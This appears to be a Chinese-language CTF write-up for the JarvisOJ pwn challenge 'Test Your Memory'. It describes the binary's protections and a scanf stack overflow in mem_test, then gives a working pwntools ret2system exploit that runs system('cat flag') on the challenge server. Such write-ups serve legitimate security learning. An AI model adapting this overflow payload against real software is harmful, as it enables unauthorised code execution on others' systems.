jarvisoj——Test Your Memory

题目

在这里插入图片描述

Wp

基本项检查,32位,开了NX,got表可写
在这里插入图片描述
这里看到alphanum_2626和mem_test
在这里插入图片描述

跟进mem_test,可以看到是scanf
在这里插入图片描述
这里可以看到偏移,直接上payload

在这里插入图片描述
在这里插入图片描述

这里一定要有返回地址,不然程序奔溃之后看不到flag

from pwn import *
sh = remote("pwn2.jarvisoj.com",9876)
e=ELF('./TestYourMemory')
sys_addr=e.symbols['system']
cat_flag_addr=e.search('cat flag').next()
payload="A"*0x13+4*"A"+p32(sys_addr)+p32(0x8048677)+p32(cat_flag_addr)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()
sh.close()
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页